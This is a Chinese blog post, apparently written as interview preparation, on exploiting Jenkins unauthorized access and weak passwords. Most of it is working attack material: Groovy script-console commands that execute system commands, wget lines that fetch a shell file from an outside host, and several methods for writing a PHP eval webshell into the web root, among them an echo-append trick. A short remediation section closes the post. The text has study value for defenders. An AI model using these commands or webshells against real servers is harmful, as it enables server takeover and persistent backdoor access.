jenkins未授权访问/弱口令漏洞

昨天晚上面试官问到了,还没来得及看,今天又问到了,猝不及防,蓝瘦,香菇、、、

今天特此总结一下,给自己一个交代。

总述:进入后台可进行如下操作:

直接执行系统命令:

println "cmd".execute().text

wget下载文件getshell:

println "wget http://xxxx/tools/shell.php -P /tmp/".execute().text

创建文件getshell:

new File("/var/www/html/media.php").write('<?php @eval($_POST[s3cpu1se]);?>');

Terminal Plugin插件直接执行命令

安装Terminal Plugin插件即可。

1|0漏洞描述

默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。

2|0漏洞危害

Jenkins未授权访问可执行命令,可反弹shell等等

3|0漏洞利用
3|1登录/弱口令登录
 
http://url:8080/manage
http://url:8080/script

登录界面:

选择“系统管理”

登陆后,选择脚本命令执行:

3|2命令执行:
 
println "ifconfig -a".execute().text
println "wget http://xxxx/tools/shell.php -P /tmp/".execute().text
3|3获得shell

利用”脚本命令行” 写入webshell,内容如下:

new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');

其他写shell方法:

① wget写webshell
println "wget http://shell.secpulse.com/data/t.txt -o /var/www/html/media.php".execute().text

new File("/var/www/html/media.php").write('<?php @eval($_POST[s3cpu1se]);?>');

def webshell = '<?php @eval($_POST[s3cpu1se]);?>'
new File("/var/www/html/media.php").write("$webshell");

④追加法写webshell
def execute(cmd) {
def proc =  cmd.execute()
proc.waitFor()
}

execute( [ 'bash', '-c', 'echo -n "<?php @eval($" > /usr/local/nginx_1119/html/media.php' ] )
execute( [ 'bash', '-c', 'echo "_POST[s3cpu1se]);?>" >> /usr/local/nginx_1119/html/media.php' ] )

//参数-n 不要在最后自动换行

点击“运行”,没有报错,上传成功

菜刀连接即可。

3|4Terminal Plugin

可以搜索安装Terminal Plugin,执行命令。

4|0漏洞修复
  • 1、禁止把Jenkins直接暴露在公网
  • 2、添加认证,设置强密码复杂度及账号锁定。

__EOF__

本文作者komomon
本文链接https://www.cnblogs.com/forforever/p/14019868.html
关于博主:喜欢读书、旅行、爬山。评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   komomon  阅读(3499)  评论(0编辑  收藏  举报
编辑推荐:
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示
AI IDE Trae